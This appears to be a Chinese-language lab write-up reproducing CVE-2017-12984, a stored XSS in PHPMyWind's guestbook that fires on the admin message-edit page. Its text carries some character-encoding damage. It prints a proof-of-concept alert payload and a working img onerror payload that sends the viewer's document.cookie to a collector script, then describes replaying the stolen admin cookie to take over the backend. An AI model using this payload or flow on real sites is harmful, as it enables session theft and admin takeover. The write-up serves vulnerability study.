眾所周知,我們一般將XSS分為三類,反射型、存儲(chǔ)型、DOM型,反射型XSS這個(gè)基本可以說是沒什么利用價(jià)值,因?yàn)樗遣荒芰舸嫦聛淼模愀淖償?shù)據(jù)執(zhí)行了一個(gè)臨時(shí)的XSS,但這個(gè)數(shù)據(jù)沒有存儲(chǔ)到服務(wù)器、數(shù)據(jù)庫中,不能再次展示給別人看,其他人進(jìn)入同一頁面請(qǐng)求服務(wù)器并不受你的腳本影響,DOM型XSS也是一樣,它就是通過影響前端的DOM環(huán)境來執(zhí)行一些js腳本,執(zhí)行的腳本并沒有留存下來,所以危害比較大的還是存儲(chǔ)型XSS,也叫永久型XSS。
平常在我的滲透測(cè)試工作過程中,不管是什么類型的XSS問題,驗(yàn)證存在XSS問題也就js一小段腳本彈一個(gè)框,證明存在即可,但實(shí)際上,作為一名高級(jí)滲透測(cè)試人員肯定是要知道對(duì)于存儲(chǔ)型XSS,針對(duì)這種漏洞,如何搭建環(huán)境接受跨站攻擊獲取的數(shù)據(jù)和利用的一整套流程。另外再補(bǔ)充下,只要是能讓你輸入的地方,留言、評(píng)論甚至URL上的參數(shù)等,你都可以試一下,還有驗(yàn)證XSS時(shí)候,不要只會(huì)一個(gè)<script>去alert,用<img>報(bào)錯(cuò)執(zhí)行、<a>超鏈接執(zhí)行JAVAscript偽協(xié)議都可以,實(shí)際上將<、>這種特殊符號(hào)及編碼過濾就已經(jīng)能解決XSS很多問題了。
這次來復(fù)現(xiàn)的漏洞是存儲(chǔ)型XSS,它的CVE編號(hào)是CVE-2017-12984,它是一套基于php環(huán)境的CMS系統(tǒng)——PHPMwWind,漏洞版本號(hào)<=5.4,所以這里的系統(tǒng)我還是放在phpstudy這套集成環(huán)境里,漏洞位置位于用戶留言功能里。
安裝不說了,看下這個(gè)漏洞存在的位置在于message.php雖然對(duì)于用戶的留言進(jìn)行了實(shí)體編碼過濾,這使得js腳本僅對(duì)于當(dāng)前頁面無法執(zhí)行content的腳本內(nèi)容,但是它任然被正常插入存到數(shù)據(jù)庫中。
但真正的使這個(gè)腳本產(chǎn)生影響的就是位于/admin/message_update.php后臺(tái)管理頁面,未將content內(nèi)容做任何處理,就直接取出來顯示,造成的跨站腳本攻擊。
首先漏洞驗(yàn)證,這個(gè)我不貼圖了,payload就<img src=0 onerror = alert(/xss/);>就行了;輸入的是在用戶留言頁面,產(chǎn)生的XSS是在管理員的留言功能管理頁,點(diǎn)擊修改即可觸發(fā)。
再次,我們插入攻擊腳本攻擊獲取的數(shù)據(jù)怎么接收,你得需要寫個(gè)簡(jiǎn)單的test.php腳本去接收數(shù)據(jù),你可以自己去搞一套云服務(wù)器環(huán)境,這里我為了方便,就和本地環(huán)境放一起了,這里用的是php腳本,肯定需要在php的環(huán)境下接收,腳本內(nèi)容如下:
這很清楚了,通俗易懂,接收到獲取的參數(shù)c的值,然后把它寫到getC.txt中,就是這么簡(jiǎn)單,再在同一目錄下建個(gè)getC.txt等著收數(shù)據(jù)就行了,先測(cè)試檢查下是否可行,URL加個(gè)參數(shù)值cc,打開getC.txt查看沒問題。
好了,現(xiàn)在構(gòu)造我們的攻擊腳本,這里我是利用報(bào)錯(cuò)執(zhí)行方法,添加一個(gè)img字節(jié)點(diǎn),設(shè)置它的屬性,圖片來源為我們接受數(shù)據(jù)腳本的地址,而取得的cookie卻是查看這段代碼用戶的cookie:
<img src = x onerror
=document.body.AppendChild(document.createElement('img')).setAttribute('src','http://localhost/test.php?c='+document.cookie);>
登錄后臺(tái)管理員,進(jìn)入留言管理模塊,點(diǎn)擊留言修改按鈕,觸發(fā)XSS,這里為什么兩個(gè)圖片標(biāo)記,第一個(gè)使我們插入的<img>圖片標(biāo)簽,第二個(gè)是我們的onerror執(zhí)行的腳本內(nèi)容,添加子元素節(jié)點(diǎn)標(biāo)簽<img>,因?yàn)榭缯灸_本(XSS)能夠執(zhí)行,所以我們這個(gè)子元素<img>標(biāo)簽?zāi)芴砑樱梢钥吹降诙€(gè)標(biāo)簽src來源是我的cookie接受的腳本,我的參數(shù)c已經(jīng)獲取到了我要的cookie,為什么能夠傳過去,因?yàn)榫W(wǎng)頁要加載這個(gè)<img>圖片,它需要向它的源服務(wù)器進(jìn)行GET請(qǐng)求,所以就會(huì)將我獲得的cookie以GET參數(shù)傳過去。
現(xiàn)在檢查一下我獲取的數(shù)據(jù)小文本getC.txt有沒有得到,果然:
會(huì)話憑證cookie已得到,剩下的就簡(jiǎn)單了,老兵cookie欺騙工具,放入我們拿到手的cookie,成功進(jìn)入管理員后臺(tái),這就是惡意攻擊者利用跨站腳本竊取會(huì)話憑證的大致流程,也證明了它的危害。
